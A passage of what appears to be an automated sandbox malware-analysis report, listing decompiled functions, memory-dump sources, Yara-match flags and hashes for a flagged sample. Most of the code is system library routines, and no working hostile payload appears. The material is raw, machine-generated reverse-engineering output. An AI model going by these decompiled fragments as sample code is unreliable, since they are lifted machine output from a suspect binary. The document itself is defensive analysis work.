                                        0x0041a6ad
                                        0x0041a6af
                                        0x0041a6ca
                                        0x0041a6d8

                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: ecff81ba1d17dda28dd7c3846c16624701e9300bcc84ce188d6bf8f56c725f29
                                        • Instruction ID: eed93968c2115ab8db4c4cf596e675c4ae5d8600dd65f113d43f7854faf3fd73
                                        • Opcode Fuzzy Hash: ecff81ba1d17dda28dd7c3846c16624701e9300bcc84ce188d6bf8f56c725f29
                                        • Instruction Fuzzy Hash: 7BE04671A40204BBC724CF64C889EDB3BA8EF49794F248569F96CAB651C235A601CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;
				void* _t11;

				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
				ExitProcess(_a8);
			}





                                        0x0041a6ca
                                        0x0041a6d8

                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 0b41bde2c0bc46780f90ebfe1f7fd4545ac8b2a00bb184d05eacfd265915b56e
                                        • Instruction ID: 74948f5a2e4a7c25a01045f0ae3ff3828075c44fadd82f8fa6d392f45cbb6c90
                                        • Opcode Fuzzy Hash: 0b41bde2c0bc46780f90ebfe1f7fd4545ac8b2a00bb184d05eacfd265915b56e
                                        • Instruction Fuzzy Hash: C3B09B719024D5C5E615D7A44E0C7177A447BD1745F17C156D2020651B4778D0D1F5B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0175B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Strings
                                        • <unknown>, xrefs: 0175B27E, 0175B2D1, 0175B350, 0175B399, 0175B417, 0175B48E
                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0175B47D
                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0175B48F
                                        • This failed because of error %Ix., xrefs: 0175B446
                                        • The instruction at %p tried to %s , xrefs: 0175B4B6
                                        • *** enter .cxr %p for the context, xrefs: 0175B50D
                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0175B3D6
                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0175B323
                                        • write to, xrefs: 0175B4A6
                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0175B2F3
                                        • The critical section is owned by thread %p., xrefs: 0175B3B9
                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0175B484
                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0175B39B
                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0175B476
                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0175B53F
                                        • *** then kb to get the faulting stack, xrefs: 0175B51C
                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0175B2DC
                                        • a NULL pointer, xrefs: 0175B4E0
                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0175B38F
                                        • The resource is owned exclusively by thread %p, xrefs: 0175B374
                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0175B314
                                        • Go determine why that thread has not released the critical section., xrefs: 0175B3C5
                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0175B305
                                        • *** Inpage error in %ws:%s, xrefs: 0175B418
                                        • read from, xrefs: 0175B4AD, 0175B4B2
                                        • *** enter .exr %p for the exception record, xrefs: 0175B4F1
                                        • The resource is owned shared by %d threads, xrefs: 0175B37E
                                        • The instruction at %p referenced memory at %p., xrefs: 0175B432
                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0175B352
                                        • an invalid address, %p, xrefs: 0175B4CF
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                        • API String ID: 0-108210295
                                        • Opcode ID: e22c19999d51863a03ff8421725843e387242cdfc2e075a5532b6fd6dee9ed37
                                        • Instruction ID: 2c75e8322c297ace579989259d880b4ff6175583ab9b4f81245c08449d9edace
                                        • Opcode Fuzzy Hash: e22c19999d51863a03ff8421725843e387242cdfc2e075a5532b6fd6dee9ed37
                                        • Instruction Fuzzy Hash: 2A81F475A40200FFDF265A4ACC4AD7BBF2BEF96A51F404098F9052B117D3B18551C7B2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01761C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E01761C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x16848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E016AB150();
				} else {
					E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x179589c);
				E016AB150("Heap error detected at %p (heap handle %p)\n",  *0x17958a0);
				_t27 =  *0x1795898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01761E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E016AB150();
				} else {
					E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E016AB150("Error code: %d - %s\n",  *0x1795898);
				_t113 =  *0x17958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E016AB150();
					} else {
						E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E016AB150("Parameter1: %p\n",  *0x17958a4);
				}
				_t115 =  *0x17958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E016AB150();
					} else {
						E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E016AB150("Parameter2: %p\n",  *0x17958a8);
				}
				_t117 =  *0x17958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E016AB150();
					} else {
						E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E016AB150("Parameter3: %p\n",  *0x17958ac);
				}
				_t119 =  *0x17958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E016AB150();
					} else {
						E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x17958b4);
					E016AB150("Last known valid blocks: before - %p, after - %p\n",  *0x17958b0);
				} else {
					_t120 =  *0x17958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E016AB150();
				} else {
					E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E016AB150("Stack trace available at %p\n", 0x17958c0);
			}











                                        0x01761c10
                                        0x01761c16
                                        0x01761c1e
                                        0x01761c3d
                                        0x01761c3e
                                        0x01761c20
                                        0x01761c35
                                        0x01761c3a
                                        0x01761c44
                                        0x01761c55
                                        0x01761c5a
                                        0x01761c65
                                        0x01761c67
                                        0x00000000
                                        0x01761c6e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01761c67
                                        0x01761cdc
                                        0x01761ce5
                                        0x01761d04
                                        0x01761d05
                                        0x01761ce7
                                        0x01761cfc
                                        0x01761d01
                                        0x01761d0b
                                        0x01761d17
                                        0x01761d1f
                                        0x01761d25
                                        0x01761d30
                                        0x01761d4f
                                        0x01761d50
                                        0x01761d32
                                        0x01761d47
                                        0x01761d4c
                                        0x01761d61
                                        0x01761d67
                                        0x01761d68
                                        0x01761d6e
                                        0x01761d79
                                        0x01761d98
                                        0x01761d99
                                        0x01761d7b
                                        0x01761d90
                                        0x01761d95
                                        0x01761daa
                                        0x01761db0
                                        0x01761db1
                                        0x01761db7
                                        0x01761dc2
                                        0x01761de1
                                        0x01761de2
                                        0x01761dc4
                                        0x01761dd9
                                        0x01761dde
                                        0x01761df3
                                        0x01761df9
                                        0x01761dfa
                                        0x01761e00
                                        0x01761e0a
                                        0x01761e13
                                        0x01761e32
                                        0x01761e33
                                        0x01761e15
                                        0x01761e2a
                                        0x01761e2f
                                        0x01761e39
                                        0x01761e4a
                                        0x01761e02
                                        0x01761e02
                                        0x01761e08
                                        0x00000000
                                        0x00000000
                                        0x01761e08
                                        0x01761e5b
                                        0x01761e7a
                                        0x01761e7b
                                        0x01761e5d
                                        0x01761e72
                                        0x01761e77
                                        0x01761e95

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                        • API String ID: 0-2897834094
                                        • Opcode ID: c69f0341701800fa577215698913be6ba605ed72dcc8d69057f820d0ece13d07
                                        • Instruction ID: e5a62b5220e90456b1e528d6ef88fcdb901f144f8799f1dede1b21aa6bda1bce
                                        • Opcode Fuzzy Hash: c69f0341701800fa577215698913be6ba605ed72dcc8d69057f820d0ece13d07
                                        • Instruction Fuzzy Hash: BB61E332951151DFD712EB89DC88E25B3ADEB54932B8981AEFC0A5F300D621AC81CF0E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016B3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E016B3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E016B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E016B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E016B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E016B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E016B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L016C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E016EF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E016F1370(_t276, 0x1684e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E016EBB40(0,  &_v68, _t170);
									if(L016B43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E016EBB40(_t257,  &_v68, _t243);
								if(L016B43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E016F1370(_t278, 0x1684e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L016C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E016EF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E016F1370(_v16, 0x1684e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E016EBB40(_t262,  &_v68, _t244);
								if(L016B43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E016F1370(_t282, 0x1684e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E016EBB40(_t262,  &_v68, _t201);
							if(L016B43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L016C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E016EF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E016F1370(_t280, 0x1684e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E016EBB40(_t267,  &_v68, _t245);
							if(L016B43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E016F1370(_t284, 0x1684e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E016EBB40(_t267,  &_v68, _t224);
						if(L016B43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                        0x016b3d3c
                                        0x016b3d42
                                        0x016b3d44
                                        0x016b3d46
                                        0x016b3d49
                                        0x016b3d4c
                                        0x016b3d4f
                                        0x016b3d52
                                        0x016b3d55
                                        0x016b3d58
                                        0x016b3d5b
                                        0x016b3d5f
                                        0x016b3d61
                                        0x016b3d66
                                        0x01708213
                                        0x01708218
                                        0x016b4085
                                        0x016b4088
                                        0x016b408e
                                        0x016b4094
                                        0x016b409a
                                        0x016b40a0
                                        0x016b40a6
                                        0x016b40a9
                                        0x016b40af
                                        0x016b40b6
                                        0x016b40bd
                                        0x016b40bd
                                        0x016b3d83
                                        0x0170821f
                                        0x01708229
                                        0x01708238
                                        0x01708238
                                        0x0170823d
                                        0x0170823d
                                        0x016b3da0
                                        0x016b3daf
                                        0x016b3db5
                                        0x016b3dba
                                        0x016b3dba
                                        0x016b3dd4
                                        0x016b3e94
                                        0x016b3eab
                                        0x016b3f6d
                                        0x016b3f84
                                        0x016b406b
                                        0x016b406b
                                        0x016b406e
                                        0x016b406e
                                        0x016b4070
                                        0x016b4074
                                        0x01708351
                                        0x01708351
                                        0x016b407a
                                        0x016b407f
                                        0x0170835d
                                        0x01708370
                                        0x01708377
                                        0x01708379
                                        0x0170837c
                                        0x0170837c
                                        0x0170835d
                                        0x00000000
                                        0x016b407f
                                        0x016b3f8a
                                        0x016b3f8d
                                        0x016b3f90
                                        0x016b3f95
                                        0x0170830d
                                        0x0170830f
                                        0x016b3f9b
                                        0x016b3fac
                                        0x016b3fae
                                        0x016b3fb1
                                        0x016b3fb1
                                        0x016b3fb6
                                        0x01708317
                                        0x0170831a
                                        0x00000000
                                        0x016b3fbc
                                        0x016b3fc1
                                        0x016b3fc9
                                        0x016b3fd7
                                        0x016b3fda
                                        0x016b3fdd
                                        0x016b4021
                                        0x016b4021
                                        0x016b4029
                                        0x016b4030
                                        0x016b4044
                                        0x016b4046
                                        0x016b4046
                                        0x016b4044
                                        0x016b4049
                                        0x01708327
                                        0x01708334
                                        0x01708339
                                        0x0170833c
                                        0x016b404f
                                        0x016b404f
                                        0x016b404f
                                        0x016b4051
                                        0x016b4056
                                        0x016b4063
                                        0x016b4063
                                        0x016b4068
                                        0x00000000
                                        0x016b4068
                                        0x016b3fdf
                                        0x016b3fe2
                                        0x016b3fe4
                                        0x016b3fe7
                                        0x016b3fef
                                        0x016b4003
                                        0x016b4005
                                        0x016b4005
                                        0x016b400c
                                        0x016b4013
                                        0x016b4016
                                        0x016b4017
                                        0x016b401b
                                        0x016b401e
                                        0x00000000
                                        0x016b401e
                                        0x016b3fb6
                                        0x016b3eb1
                                        0x016b3eb4
                                        0x016b3eb7
                                        0x016b3ebc
                                        0x017082a9
                                        0x017082ab
                                        0x016b3ec2
                                        0x016b3ed3
                                        0x016b3ed5
                                        0x016b3ed8
                                        0x016b3ed8
                                        0x016b3edd
                                        0x017082b3
                                        0x017082b6
                                        0x00000000
                                        0x016b3ee3
                                        0x016b3ee8
                                        0x016b3eed
                                        0x016b3ef0
                                        0x016b3ef3
                                        0x016b3f02
                                        0x016b3f05
                                        0x016b3f08
                                        0x017082c0
                                        0x017082c3
                                        0x017082c5
                                        0x017082c8
                                        0x017082d0
                                        0x017082e4
                                        0x017082e6
                                        0x017082e6
                                        0x017082ed
                                        0x017082f4
                                        0x017082f7
                                        0x017082f8
                                        0x017082fc
                                        0x017082ff
                                        0x017082ff
                                        0x016b3f0e
                                        0x016b3f11
                                        0x016b3f16
                                        0x016b3f1d
                                        0x016b3f31
                                        0x01708307
                                        0x01708307
                                        0x016b3f31
                                        0x016b3f39
                                        0x016b3f48
                                        0x016b3f4d
                                        0x016b3f50
                                        0x016b3f50
                                        0x016b3f53
                                        0x016b3f58
                                        0x016b3f65
                                        0x016b3f65
                                        0x016b3f6a
                                        0x00000000
                                        0x016b3f6a
                                        0x016b3edd
                                        0x016b3dda
                                        0x016b3ddd
                                        0x016b3de0
                                        0x016b3de5
                                        0x01708245
                                        0x016b3deb
                                        0x016b3df7
                                        0x016b3dfc
                                        0x016b3dfe
                                        0x016b3e01
                                        0x016b3e01
                                        0x016b3e06
                                        0x0170824d
                                        0x0170824f
                                        0x01708254
                                        0x00000000
                                        0x016b3e0c
                                        0x016b3e11
                                        0x016b3e16
                                        0x016b3e19
                                        0x016b3e29
                                        0x016b3e2c
                                        0x016b3e2f
                                        0x0170825c
                                        0x0170825f
                                        0x01708261
                                        0x01708264
                                        0x0170826c
                                        0x01708280
                                        0x01708282
                                        0x01708282
                                        0x01708289
                                        0x01708290
                                        0x01708293
                                        0x01708294
                                        0x01708298
                                        0x0170829b
                                        0x0170829b
                                        0x016b3e35
                                        0x016b3e38
                                        0x016b3e3d
                                        0x016b3e44
                                        0x016b3e58
                                        0x017082a3
                                        0x017082a3
                                        0x016b3e58
                                        0x016b3e60
                                        0x016b3e6f
                                        0x016b3e74
                                        0x016b3e77
                                        0x016b3e77
                                        0x016b3e7a
                                        0x016b3e7f
                                        0x016b3e8c
                                        0x016b3e8c
                                        0x016b3e91
                                        0x00000000
                                        0x016b3e91

                                        Strings
                                        • Kernel-MUI-Language-Disallowed, xrefs: 016B3E97
                                        • Kernel-MUI-Language-Allowed, xrefs: 016B3DC0
                                        • Kernel-MUI-Number-Allowed, xrefs: 016B3D8C
                                        • Kernel-MUI-Language-SKU, xrefs: 016B3F70
                                        • WindowsExcludedProcs, xrefs: 016B3D6F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                        • API String ID: 0-258546922
                                        • Opcode ID: 07739f5361179becfa4b666db069cd66aab3dcc93e8877e629263f1102e72fd8
                                        • Instruction ID: ea0eda86cd74f69f10aa383e8b2563a95f9b7373be429c838ca3a8982b50afc8
                                        • Opcode Fuzzy Hash: 07739f5361179becfa4b666db069cd66aab3dcc93e8877e629263f1102e72fd8
                                        • Instruction Fuzzy Hash: AAF14C72D01219EFCB12DF98CD80AEEBBF9FF58650F14016AE505A7251EB309E41CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E016D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
